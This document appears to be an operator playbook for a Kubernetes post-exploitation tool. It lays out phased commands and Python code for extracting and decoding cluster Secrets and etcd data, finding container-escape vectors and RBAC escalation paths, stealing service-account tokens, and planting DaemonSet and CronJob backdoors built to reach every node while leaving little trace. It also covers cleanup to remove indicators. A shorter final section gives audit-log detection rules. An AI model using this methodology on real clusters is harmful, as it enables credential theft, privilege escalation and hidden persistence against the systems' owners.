| name | k8s-postexploit |
| description | Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence |
| category | post-exploitation |
| tags | ["kubernetes","k8s","container","post-exploitation","rbac","escape","etcd","secrets","daemonset","cronjob"] |
| tech_stack | ["kubernetes","python","etcd"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-250"] |
| chains_with | ["T1611","T1552.007","T1613","T1610","T1053.007"] |
| prerequisites | ["T1610","T1078"] |
| version | 1.0 |
Kubernetes Post-Exploitation Methodology
Kubernetes post-exploitation targets cluster resources, RBAC misconfigurations, container security boundaries, and etcd (where every Secret in the cluster is stored). After compromising a pod or obtaining a kubeconfig, the kubehook programs below cover cluster enumeration, privilege escalation, container escape, and persistent access, in that order.
Prerequisites
- Kubernetes access — kubeconfig file, service account token (mounted in every pod at /var/run/secrets/kubernetes.io/serviceaccount/token unless automountServiceAccountToken is false), or in-cluster config
- Python packages — pip3 install kubernetes etcd3
- Current context — confirm what the current identity can do and that the client imports before starting:
kubectl cluster-info
kubectl auth can-i --list
python3 -c "from kubernetes import client; print('OK')"
Kill Chain Phases
Phase 1 — Cluster Enumeration
| Action | Command | Purpose |
|---|---|---|
| Full enumeration | kubehook k8s_enum | Map namespaces, pods, services, RBAC, ingress |
| Secret metadata | kubehook k8s_enum --namespace kube-system | Focus on high-value system namespace |
Phase 2 — Secret Extraction
| Action | Command | Purpose |
|---|---|---|
| K8s Secrets | kubehook k8s_secrets | Extract and decode all Kubernetes Secrets |
| etcd dump | kubehook etcd_dump --endpoint ENDPOINT | Direct etcd access for all secrets (needs the etcd client cert/key, on kubeadm control-plane nodes under /etc/kubernetes/pki/etcd/; Secrets sit in etcd as plaintext unless encryption at rest is configured) |
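What "extract and decode" actually involves once the Secret objects are in hand, as an added example (this is not kubehook's code): the API returns every value base64-encoded, and the useful part is classifying what came back. A service-account-token Secret carries a JWT whose claims name the identity it grants; a dockerconfigjson Secret carries registry credentials; Opaque Secrets are whatever the application put there. The sample Secrets, the dummy JWT and the `registry.example.internal` host are constructed for the example.

```python
import base64
import json
from typing import Any, Dict, List


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop their '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _fake_jwt(claims: Dict[str, Any]) -> str:
    """Constructed token in JWT layout with a dummy signature, only for the sample below."""
    header = _b64url_encode(b'{"alg":"RS256","kid":"sample"}')
    return f"{header}.{_b64url_encode(json.dumps(claims).encode())}.notarealsignature"


# Constructed Secret objects shaped like the items of `kubectl get secrets -A -o json`.
SAMPLE_SECRETS: List[Dict[str, Any]] = [
    {
        "metadata": {"name": "deployer-token-abc12", "namespace": "kube-system"},
        "type": "kubernetes.io/service-account-token",
        "data": {
            "namespace": _b64("kube-system"),
            "token": _b64(_fake_jwt({
                "iss": "kubernetes/serviceaccount",
                "sub": "system:serviceaccount:kube-system:deployer",
                "kubernetes.io/serviceaccount/service-account.name": "deployer",
            })),
        },
    },
    {
        "metadata": {"name": "regcred", "namespace": "prod"},
        "type": "kubernetes.io/dockerconfigjson",
        "data": {".dockerconfigjson": _b64(json.dumps(
            {"auths": {"registry.example.internal": {"auth": _b64("ci:hunter2")}}}))},
    },
    {
        "metadata": {"name": "app-config", "namespace": "prod"},
        "type": "Opaque",
        "data": {"DB_PASSWORD": _b64("s3cret"), "LOG_LEVEL": _b64("info")},
    },
]


def decode_secret(secret: Dict[str, Any]) -> Dict[str, str]:
    """Return {key: plaintext}; the API only ever returns .data values base64-encoded."""
    return {k: base64.b64decode(v).decode("utf-8", errors="replace")
            for k, v in (secret.get("data") or {}).items()}


def jwt_claims(token: str) -> Dict[str, Any]:
    """Read the claims of a JWT without verifying it: we only want to know whose token it is."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT")
    return json.loads(_b64url_decode(parts[1]))


def registry_credentials(dockerconfig: str) -> Dict[str, str]:
    """Map registry host -> 'user:password' from a .dockerconfigjson blob."""
    auths = json.loads(dockerconfig).get("auths", {})
    return {host: base64.b64decode(entry["auth"]).decode()
            for host, entry in auths.items() if "auth" in entry}


def triage_secrets(secrets: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Decode every Secret and record the identity or credential it carries."""
    findings = []
    for s in secrets:
        data = decode_secret(s)
        entry = {"namespace": s["metadata"]["namespace"], "name": s["metadata"]["name"],
                 "type": s.get("type", "Opaque"), "keys": sorted(data)}
        if entry["type"] == "kubernetes.io/service-account-token" and "token" in data:
            entry["identity"] = jwt_claims(data["token"]).get("sub")
        elif entry["type"] == "kubernetes.io/dockerconfigjson" and ".dockerconfigjson" in data:
            entry["registries"] = registry_credentials(data[".dockerconfigjson"])
        findings.append(entry)
    return findings


if __name__ == "__main__":
    for f in triage_secrets(SAMPLE_SECRETS):
        print(f)
```

Against a live cluster, feed `triage_secrets` the `items` of `kubectl get secrets -A -o json`. One caveat when counting on service-account-token Secrets: since Kubernetes 1.24 the control plane no longer auto-creates a long-lived token Secret per ServiceAccount, so on current clusters the token to take is usually the projected one on a running pod's filesystem rather than a Secret object.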
Phase 3 — Privilege Escalation
| Action | Command | Purpose |
|---|---|---|
| Container escape | kubehook k8s_escape | Detect escape vectors (privileged, hostPID, docker socket) |
| RBAC abuse | kubehook k8s_privesc --method bind_admin | Create a ClusterRoleBinding to cluster-admin (RBAC escalation prevention only lets this through if the caller already holds those permissions or has the bind verb on the cluster-admin ClusterRole) |
| SA token theft | kubehook k8s_privesc --method sa_token | Steal service account tokens from pods |
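The two checks behind Phase 3, as an added example rather than kubehook's own logic: `find_escape_vectors` reads a Pod object and reports the settings that cross the container boundary (host namespaces, hostPath mounts including the runtime socket, privileged containers, added capabilities), and `rbac_escalation_paths` evaluates a set of PolicyRules for the verbs that lead to cluster-admin or to code on a node. The sample Pod, the CI rules, and the capability list are constructed assumptions of the example; `resourceNames` restrictions are ignored, so the RBAC check over-approximates.

```python
from typing import Any, Dict, List

# Capabilities flagged because they reach the host kernel or other processes (an assumption of
# this example, not an exhaustive list).
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH", "NET_ADMIN"}
RUNTIME_SOCKETS = {"/var/run/docker.sock", "/run/containerd/containerd.sock", "/run/crio/crio.sock"}


def find_escape_vectors(pod: Dict[str, Any]) -> List[str]:
    """Inspect one Pod object (`kubectl get pod -o json`) for host-escape vectors."""
    spec = pod["spec"]
    vectors: List[str] = []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            vectors.append(flag)
    for vol in spec.get("volumes") or []:
        path = (vol.get("hostPath") or {}).get("path")
        if path is None:
            continue
        vectors.append(f"hostPath:{path}")            # any host mount is a foothold; '/' is a full escape
        if path in RUNTIME_SOCKETS:
            vectors.append(f"runtime-socket:{path}")  # lets you start a privileged container on the node
    for ctr in (spec.get("containers") or []) + (spec.get("initContainers") or []):
        sc = ctr.get("securityContext") or {}
        if sc.get("privileged"):
            vectors.append(f"privileged:{ctr['name']}")  # all caps and host devices: mount the host disk
        added = set((sc.get("capabilities") or {}).get("add") or [])
        for cap in sorted(added & DANGEROUS_CAPS):
            vectors.append(f"cap:{cap}:{ctr['name']}")
    return vectors


def _allows(rules: List[Dict[str, Any]], verb: str, group: str, resource: str) -> bool:
    """Does any PolicyRule grant verb on group/resource? resourceNames are ignored."""
    for rule in rules:
        groups = rule.get("apiGroups") or [""]
        if group not in groups and "*" not in groups:
            continue
        resources = rule.get("resources") or []
        if resource not in resources and "*" not in resources:
            continue
        verbs = rule.get("verbs") or []
        if verb in verbs or "*" in verbs:
            return True
    return False


RBAC = "rbac.authorization.k8s.io"
# label -> every (verb, apiGroup, resource) the path needs. Creating a ClusterRoleBinding to
# cluster-admin is refused by RBAC escalation prevention unless the caller already holds those
# permissions or has 'bind' on the target ClusterRole, so the first check requires both verbs.
ESCALATION_CHECKS = [
    ("bind cluster-admin", [("create", RBAC, "clusterrolebindings"), ("bind", RBAC, "clusterroles")]),
    ("escalate clusterroles", [("escalate", RBAC, "clusterroles")]),
    ("impersonate users", [("impersonate", "", "users")]),
    ("get secrets", [("get", "", "secrets")]),
    ("list secrets", [("list", "", "secrets")]),   # list returns the bodies, not just the names
    ("mint SA tokens", [("create", "", "serviceaccounts/token")]),
    ("create pods", [("create", "", "pods")]),     # schedule a privileged/hostPath pod, then escape
    ("exec into pods", [("create", "", "pods/exec")]),
]


def rbac_escalation_paths(rules: List[Dict[str, Any]]) -> List[str]:
    """Evaluate the PolicyRules of a Role/ClusterRole (or the union of rules bound to a subject)."""
    return [label for label, needs in ESCALATION_CHECKS if all(_allows(rules, *n) for n in needs)]


# Constructed samples: a "monitoring agent" Pod and the rules bound to a CI service account.
SAMPLE_POD = {
    "metadata": {"name": "node-agent", "namespace": "monitoring"},
    "spec": {
        "hostPID": True,
        "volumes": [{"name": "dockersock", "hostPath": {"path": "/var/run/docker.sock"}},
                    {"name": "tmp", "emptyDir": {}}],
        "containers": [{"name": "agent", "image": "example/agent:1.0",
                        "securityContext": {"privileged": True,
                                            "capabilities": {"add": ["SYS_PTRACE", "NET_BIND_SERVICE"]}}}],
    },
}
SAMPLE_RULES = [
    {"apiGroups": [""], "resources": ["pods", "pods/log"], "verbs": ["get", "list", "create", "delete"]},
    {"apiGroups": [""], "resources": ["secrets"], "verbs": ["list"]},
    {"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["*"]},
]

if __name__ == "__main__":
    print(find_escape_vectors(SAMPLE_POD))
    print(rbac_escalation_paths(SAMPLE_RULES))
```

To run the RBAC check on the identity you actually hold, collect the rules from every Role/ClusterRole bound to it (that is what `kubectl auth can-i --list` summarises) and pass the union; a `*`/`*`/`*` rule trips every check.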
Phase 4 — Persistence
| Action | Command | Purpose |
|---|---|---|
| DaemonSet backdoor | kubehook k8s_backdoor --type daemonset --image IMAGE | Deploy on every node (only reaches tainted control-plane nodes if the pod template tolerates their taints) |
| CronJob backdoor | kubehook k8s_backdoor --type cronjob --image IMAGE | Periodic callback |
Phase 5 — Cleanup (MANDATORY)
kubehook cleanup_k8s
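The shape of the two persistence manifests and the label-based cleanup that has to undo them, as an added example (not kubehook's own manifests or its label scheme): both workloads carry a session label, the DaemonSet template tolerates every taint so it really lands on every node, the CronJob keeps no finished Job history, and `cleanup_targets` selects exactly the labelled resources for deletion. The `example.org/op-tag` label key, the session value, the image name, and the sample cluster contents are constructed assumptions.

```python
from typing import Any, Dict, List, Tuple

# Hypothetical label used to tag everything one session creates, so cleanup can find it all.
OP_LABEL = "example.org/op-tag"


def _pod_template(name: str, image: str, args: List[str], tag: str, restart: str) -> Dict[str, Any]:
    return {
        "metadata": {"labels": {"app": name, OP_LABEL: tag}},
        "spec": {
            # Tolerate every taint: without this the DaemonSet skips NoSchedule-tainted
            # control-plane nodes, so "every node" would silently exclude the most valuable ones.
            "tolerations": [{"operator": "Exists"}],
            "containers": [{"name": "agent", "image": image, "args": args}],
            "restartPolicy": restart,
        },
    }


def daemonset_manifest(name: str, namespace: str, image: str, args: List[str], tag: str) -> Dict[str, Any]:
    return {
        "apiVersion": "apps/v1", "kind": "DaemonSet",
        "metadata": {"name": name, "namespace": namespace, "labels": {"app": name, OP_LABEL: tag}},
        "spec": {"selector": {"matchLabels": {"app": name}},
                 "template": _pod_template(name, image, args, tag, "Always")},
    }


def cronjob_manifest(name: str, namespace: str, image: str, args: List[str], tag: str,
                     schedule: str = "*/10 * * * *") -> Dict[str, Any]:
    return {
        "apiVersion": "batch/v1", "kind": "CronJob",
        "metadata": {"name": name, "namespace": namespace, "labels": {"app": name, OP_LABEL: tag}},
        "spec": {"schedule": schedule, "concurrencyPolicy": "Forbid",
                 # leave no completed Jobs (and their pods) lying around between callbacks
                 "successfulJobsHistoryLimit": 0, "failedJobsHistoryLimit": 0,
                 "jobTemplate": {"spec": {"template": _pod_template(name, image, args, tag, "Never")}}},
    }


def parse_selector(selector: str) -> Dict[str, str]:
    """Parse the equality form kubectl accepts with -l: 'k=v,k2=v2'."""
    out: Dict[str, str] = {}
    for term in filter(None, selector.split(",")):
        key, _, value = term.partition("=")
        out[key.strip()] = value.strip()
    return out


def cleanup_targets(resources: List[Dict[str, Any]], selector: str) -> List[Tuple[str, str, str]]:
    """(kind, namespace, name) of every listed resource whose labels match the selector."""
    wanted = parse_selector(selector)
    hits = []
    for r in resources:
        labels = r.get("metadata", {}).get("labels") or {}
        if all(labels.get(k) == v for k, v in wanted.items()):
            hits.append((r["kind"], r["metadata"].get("namespace"), r["metadata"]["name"]))
    return hits


# Constructed: what one session created, plus an unrelated DaemonSet that must survive cleanup.
SESSION = "op-7f3a"
IMAGE = "registry.example.internal/agent:1"
SAMPLE_CLUSTER = [
    daemonset_manifest("node-agent", "kube-system", IMAGE, ["--mode", "beacon"], SESSION),
    cronjob_manifest("cache-warm", "prod", IMAGE, ["--mode", "beacon"], SESSION),
    {"apiVersion": "apps/v1", "kind": "DaemonSet",
     "metadata": {"name": "kube-proxy", "namespace": "kube-system", "labels": {"k8s-app": "kube-proxy"}}},
]

if __name__ == "__main__":
    print(cleanup_targets(SAMPLE_CLUSTER, f"{OP_LABEL}={SESSION}"))
```

The same selection, typed against a cluster, is `kubectl delete daemonset,cronjob -A -l example.org/op-tag=op-7f3a`; whatever label kubehook uses, the point of `cleanup_k8s` is that every created object carries it, so nothing depends on remembering names.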
Detection Considerations
- Kubernetes Audit Logs — API server audit logging records every request with user, verb, resource and response code; ClusterRoleBinding creation, Secret get/list outside system components, pods/exec and new DaemonSets or CronJobs created by a service account are the high-signal events for this chain
- Falco — runtime detection of container escape and privilege escalation (privileged container start, entering host namespaces, access to the container runtime socket)
- OPA/Gatekeeper (or Pod Security Admission) — admission policy that rejects privileged, hostPID/hostNetwork and hostPath pods before they schedule, which removes most of the k8s_escape vectors
- Network Policies — restrict pod-to-pod and egress traffic, which breaks backdoor callbacks but does not limit access to the API server
- RBAC analyzers — tools like rbac-police and kubectl-who-can find bindings that allow bind/escalate/impersonate, Secret reads or pod creation
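Detection logic for the audit-log events named above, run over constructed sample lines, as an added example (not a kubehook component and not a real cluster's output). The events follow the audit.k8s.io Event layout the API server writes one-per-line to --audit-log-path; the ClusterRoleBinding create is assumed to be logged at RequestResponse level, since at Metadata level `requestObject` (and so the roleRef) is absent. Only the ResponseComplete stage is evaluated so a single request is not counted at each of its stages, and 403s against sensitive resources are reported as attempts.

```python
import json
from typing import Any, Dict, List, Tuple

# Constructed audit events, one JSON object per line. Usernames, names and namespaces are made up.
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    {"stage": "ResponseComplete", "verb": "list", "user": {"username": "system:serviceaccount:ci:deployer"},
     "objectRef": {"resource": "secrets"}, "responseStatus": {"code": 200}},   # no namespace: cluster-wide
    {"stage": "ResponseComplete", "verb": "create", "user": {"username": "system:serviceaccount:ci:deployer"},
     "objectRef": {"resource": "clusterrolebindings", "apiGroup": "rbac.authorization.k8s.io", "name": "ops-admin"},
     "responseStatus": {"code": 403}},                                          # first attempt, denied
    {"stage": "RequestReceived", "verb": "create", "user": {"username": "system:serviceaccount:ci:deployer"},
     "objectRef": {"resource": "clusterrolebindings", "apiGroup": "rbac.authorization.k8s.io", "name": "ops-admin"},
     "requestObject": {"roleRef": {"kind": "ClusterRole", "name": "cluster-admin"}}},
    {"stage": "ResponseComplete", "verb": "create", "user": {"username": "system:serviceaccount:ci:deployer"},
     "objectRef": {"resource": "clusterrolebindings", "apiGroup": "rbac.authorization.k8s.io", "name": "ops-admin"},
     "requestObject": {"roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
                       "subjects": [{"kind": "ServiceAccount", "name": "deployer", "namespace": "ci"}]},
     "responseStatus": {"code": 201}},
    {"stage": "ResponseComplete", "verb": "create", "user": {"username": "system:serviceaccount:ci:deployer"},
     "objectRef": {"resource": "daemonsets", "apiGroup": "apps", "namespace": "kube-system", "name": "node-agent"},
     "responseStatus": {"code": 201}},
    {"stage": "ResponseComplete", "verb": "create", "user": {"username": "alice"},
     "objectRef": {"resource": "pods", "subresource": "exec", "namespace": "prod", "name": "web-0"},
     "responseStatus": {"code": 101}},                                          # exec upgrades to SPDY/WebSocket
    {"stage": "ResponseComplete", "verb": "get", "user": {"username": "system:kube-controller-manager"},
     "objectRef": {"resource": "secrets", "namespace": "kube-system", "name": "bootstrap-token-abc"},
     "responseStatus": {"code": 200}},                                          # control plane, expected
    {"stage": "ResponseComplete", "verb": "list", "user": {"username": "alice"},
     "objectRef": {"resource": "pods", "namespace": "prod"}, "responseStatus": {"code": 200}},
])

SYSTEM_USERS = ("system:kube-", "system:apiserver")   # control-plane components read Secrets legitimately
SENSITIVE = {"clusterrolebindings", "clusterroles", "secrets", "pods/exec", "serviceaccounts/token", "daemonsets"}


def parse_audit_log(text: str) -> List[Dict[str, Any]]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events: List[Dict[str, Any]]) -> List[Tuple[str, str, str]]:
    """Return (rule, username, detail) for every event that matches a rule, in log order."""
    alerts: List[Tuple[str, str, str]] = []
    for ev in events:
        if ev.get("stage") != "ResponseComplete":   # RequestReceived/ResponseStarted would double-count
            continue
        ref = ev.get("objectRef") or {}
        verb, user = ev.get("verb"), ev.get("user", {}).get("username", "?")
        res = ref.get("resource", "") + ("/" + ref["subresource"] if ref.get("subresource") else "")
        ns, name = ref.get("namespace") or "<cluster-wide>", ref.get("name") or "*"
        code = (ev.get("responseStatus") or {}).get("code", 0)
        if code == 403 and res in SENSITIVE:
            alerts.append(("forbidden", user, f"{verb} {res} {ns}/{name}"))
        elif code >= 400:
            continue
        elif res == "clusterrolebindings" and verb in ("create", "update", "patch"):
            role = ((ev.get("requestObject") or {}).get("roleRef") or {}).get("name")
            if role == "cluster-admin":
                alerts.append(("cluster-admin-binding", user, name))
        elif res == "secrets" and verb in ("get", "list") and not user.startswith(SYSTEM_USERS):
            alerts.append(("secret-read", user, f"{verb} {ns}/{name}"))
        elif res == "pods/exec" and verb == "create":
            alerts.append(("pod-exec", user, f"{ns}/{name}"))
        elif res in ("daemonsets", "cronjobs") and verb == "create" and user.startswith("system:serviceaccount:"):
            alerts.append(("workload-by-serviceaccount", user, f"{res} {ns}/{name}"))
        elif res == "serviceaccounts/token" and verb == "create":
            alerts.append(("token-request", user, f"{ns}/{name}"))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_audit_log(SAMPLE_AUDIT_LOG)):
        print(alert)
```

The `secret-read` rule will also fire for legitimate operators and controllers that run as service accounts; tune the allow-list prefix rather than dropping the rule, because a cluster-wide `list secrets` by a CI account is exactly what `k8s_secrets` looks like from the API server's side.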
Program Reference
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| k8s_enum | Cluster resource enumeration | T1613 — Container and Resource Discovery |
| k8s_secrets | Kubernetes Secret extraction | T1552.007 — Container API |
| k8s_escape | Container escape exploitation | T1611 — Escape to Host |
| k8s_privesc | RBAC privilege escalation | T1078 — Valid Accounts |
| etcd_dump | Direct etcd data extraction | T1552.007 — Container API |
| k8s_backdoor | DaemonSet/CronJob persistence | T1053.007 — Container Orchestration Job |
| cleanup_k8s | Resource removal by label selector | T1070 — Indicator Removal |